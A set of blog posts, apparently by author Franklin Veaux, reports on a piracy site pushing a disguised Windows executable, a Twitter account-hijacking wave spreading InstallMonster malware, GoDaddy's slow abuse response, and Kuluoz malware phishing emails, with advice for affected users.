i removed your book from our site http://www.masszip.com/two-practical-guide-ethical-polyamory-franklin-veaux-

Now now it does not exist on our site . Sorry for this.

I have removed your books on the web masszip
so you also please remove your post says about us here http://blog.franklinveaux.com/2014/06/piracy-and-more-than-two-caveat-emptor/

Thanks u !

Apparently, they don’t like blog posts saying they’re claiming to give away bootlegged books for free but in fact are distributing Windows executables.

UPDATE 5 (27-July-2014): I’ve received another email from the person who claims to be behind the site, apparently upset I haven’t taken down this post:

From: Luella Forbes
To: [my franklinveaux dot com address]
Subject: Franklin is gay!
Date: Sun, 27 Jul 2014 23:16:54 +0100

Franklin is gay ,ok update it on your blog now . U are lady ,that is true

I wonder if I should give this person’s email address to the publishers of all the books the Web site claims to have available for free download.

UPDATE 6 (14-August-2014): The page is back on Masszip advertising More Than Two. As before, it doesn’t actually lead to a download of the eBook; instead, if you jump through the affiliate marketing hoops to get it, you end up with a Windows executable disguised as an eBook.

Also, the Masszip folks are back to using the Blue Track Media affiliate link. I’ve emailed Blue Track Media about it.

Large-scale hack attack against Twitter?

I woke up late this morning, had breakfast, made some tea, checked my Twitter feed (as one does), and in amongst all the pictures of cats, half-naked selfies, BDSM porn, and links to articles about neurophysiology and evolutionary biology that make up my Twitter feed, I noticed something very odd. About 15% of my Twitter followers were posting things that look like this:

And imagine my surprise when one of the accounts posting these types of messages belonged to me; namely, my Promiscuity Keepers Twitter feed, where I post links to articles about sex and sexuality.

So it appears there’s a pretty large attack going on against Twitter right now. I am not sure if the attack is simply a brute-force hack against account passwords, or if the hackers have somehow penetrated Twitter itself and made off with lists off accounts and (hashed? hashed and salted? exposed?) passwords. Because of the suddenness and number of accounts compromised, my gut says it might be an attack on Twitter’s servers directly, rather than a brute-force attack against individual accounts. (The password I use is, of course, a long string of letters and numbers, rather than, say, the word “password” or “secret” or the other hideously insecure passwords people often use.)

I logged in to my Twitter account (after some faffing with Twitter’s “forgot my password” link) and discovered something interesting: The hackers are authorizing malicious Twitter apps with read/write access, presumably to mass-broadcast spam to many Twitter accounts at once.

Resetting a password on a hacked account without revoking access to these malicious apps will allow the hackers to retain control of the account. It’s possible the hackers are using these malicious apps to gain control of the hacked accounts directly, by forging permission to allow the account to authorize the apps.

In any event, the Spamvertised links all point to a Web site hosted by a German Web hosting firm called plusserver.de. It’s a Russian-language file-sharing site, and each of the Spamvertised links claims to be a driver package for some model of computer.

Naturally, I downloaded one of these files, then uploaded it to Virustotal for analysis. And, unsurprisingly, it’s malware:

InstallMonster is a malware package designed to cheat online advertisers out of money for the virus writers. Whenever a user of an infected computer clicks on certain Web links, the malware changes the link in such a way as to make it seem like the click came from a revenue sharing, advertising, or affiliate marketing site, and the malware writer receives a small commission for the click.

The malware is sold openly from a Russian-language site called getfile.eu, hosted by a Web hosting outfit in Cyprus called hostzealot.com.

So to recap: Attackers are gaining access to large numbers of Twitter accounts and using them to spam malware. The malware is an off-the-shelf package designed to allow its users to profit from click fraud; the malware authors operate a site hosted on hostzealot.com. The compromised Twitter accounts have read/write access granted by malicious Twitter apps. They’re being used to spread links to the InstallMonster malware, probably not from the malware’s actual authors, but from people who’ve bought a copy of InstallMonster and customized it to direct money to them. (That’s increasingly the way the malware industry works: people create turnkey malware kits which they then sell to other criminals.)

IF YOUR TWITTER ACCOUNT IS HACKED: It’s not enough just to change your password! You must also go to your Apps control panel in your profile and revoke access to the malicious apps!

GoDaddy, malware, and an ISP’s fall from grace

Some time ago, I posted about a malware attack hitting a large number of sites all across the globe, in which hacked Web sites were subverted into distributing a Windows-based bit of malware called W32/Kuluoz, which attempts to steal banking, PayPal, eBay, FTP, and other passwords from your computer.

In that post, I charted the ISPs hosting the most malware-infected sites, and noted that US ISP GoDaddy was, by far, hosting the most active malware droppers.

I used to be a GoDaddy customer. I hosted many Web sites on their servers, some of them for eleven years, and I recommended them to my clients as well. A couple of years back, I started pulling my sites off GoDaddy and recommending that my clients do the same because they began experiencing severe performance issues affecting their shared hosting database servers.

In all the time I have hosted with them in the past, though, the one thing I’ve really liked about them was their abuse team. At the time, it was one of the swiftest, most savvy, most responsive abuse and security teams of any major ISP on the market.

Those days appear to be gone.


The post I linked to above was written in April. Right now, as I type this, many of the malware droppers I saw back then on GoDaddy’s servers are,unbelievably, still active.

GoDaddy, in the spam span of just a couple of years, seems to have gone from being one of the top anti-abuse ISPs to being one of the worst. I have, quite literally, seen tiny ISPs in normally spam and malware friendly havens like Romania deal with security and abuse issues better.

One one level, it might be assumed that large ISPs are just getting worse about security and abuse issues in general. After all, an ISP’s abuse and security team are paid to reduce the company’s revenue, something that’s hard to stomach in a world where hosting providers are becoming part of Wall Street, particularly in an economic downturn.

Or it could be a statistical fluke. As ISPs host more sites, the number of sites with security problems might naturally be expected to increase.

But neither of those ideas seems to explain GoDaddy’s problems. Other ISPs, even large ISPs which have in the past had serious issues with security (like Dreamhost, a hosting company which has in the past had serious security problems of its own), are actually getting better–more responsive, more secure, faster to take down malware-infected sites.

Nearly all the ISPs I have seen be targeted by the Kuluoz malware attacks have grown better at detecting them and better at shutting down compromised sites quickly.

Nearly all, that is, except GoDaddy.


It’s hard to say what’s happening inside GoDaddy. What’s happening from the outside, however, is plain. Its abuse team does not respond to malware and security reports. Reported malware sites stay active for months. There’s a site I first reported to GoDaddy in November that was only finally fixed in May, and I’m not sure it was GoDaddy’s doing; the site owner may have secured the site himself. Repeated complaints to GoDaddy’s abuse team, in email and using their abuse Web form, produce few or no results.

Meanwhile, the entire Internet suffers. GoDaddy customers have their sites compromised and taken over by organized crime. Web surfers get directed to malware droppers hosted by GoDaddy. GoDaddy appears to be aware of the situation, at least if they monitor their Web forms and abuse address (something which has not been conclusively demonstrated, I’ll admit), and chooses not to act.

For a short time, GoDaddy’s Twitter team was responsive to these problems. When I started tweeting about GoDaddy-hosted malware droppers which had been active on their servers for months, I would receive responses like this:

I was briefly hopeful, but the infected sites remained active, still spreadingthe Kuluoz malware.

It’s hard to understand why, as many ISPs move in the direction of being responsive and security-conscious, GoDaddy is moving in the opposite direction.

At the moment, as I type this blog post, I am aware of at many malware droppers on GoDaddy’s servers, many of which have been active for four months or more, including malware droppers on sites like www.buysynthetic.com and www.wiredprojects.com which GoDaddy has been notified of multiple times and which continue to remain active.

At this point, it appears the best course of action is to avoid GoDaddy and to advise others to do the same. I no longer recommend GoDaddy to my clients, and I’ve pulled my own sites off their servers. I am also transferring my domains away from GoDaddy as they come up for renewal.

It’s disappointing to see a large company that was once so responsive to abuse and security issues sink to the point where they’re now worse in that regard than ISPs in Romania and Kazakhstan.

There is a saying in the anti-spam community: the normal course of business of a spam-supporting ISP is to go out of business. It will be interesting to see if GoDaddy follows this course, or if they are able to change direction before their inability to act against compromised sites costs them significantly.


UPDATE: Two days after posting this, I received the following email from GoDaddy:

Dear Franklin

Thank you for sharing your feedback with us.

Please rest assured that GoDaddy takes security and malware issues seriously. We have fully investigated your concerns and at this time all reported malware has been removed. We encourage CMS users to follow best practices, keeping core and secondary components such as plug-ins and extensions up to date. We welcome any additional feedback you wish to share in reply.

Thank you for your time and as always, thank you for being a GoDaddy customer.

John M.
Office of the CEO, GoDaddy
14455. N. Hayden Rd. Suite 226
Scottsdale, AZ 85260
CEOTeam@GoDaddy.com
480-505-8828

I’ve checked the emails I’ve sent them, and sure enough, all the malware droppers are gone.

Evolution of the W32/Kuluoz malware scam

Well, boys and girls, it looks like the malware distribution I talked about here and here has morphed again. This morning, I started receiving emails that pretend to be DHL delivery notifications, rather than American Airlines ticket sales or FedEx notifications:

As before, the links take you to hacked WordPress or Joomla sites that will examine your browser user-agent. If you’re on a Mac or Linux computer, or you’re using a modern Windows browser, you’ll see a phony 404 Not Found error that looks like this:

If you’re using a Windows browser that has vulnerabilities, the link will download a copy of the W32/Kuluoz information and bank password stealing malware.

Stay safe out there.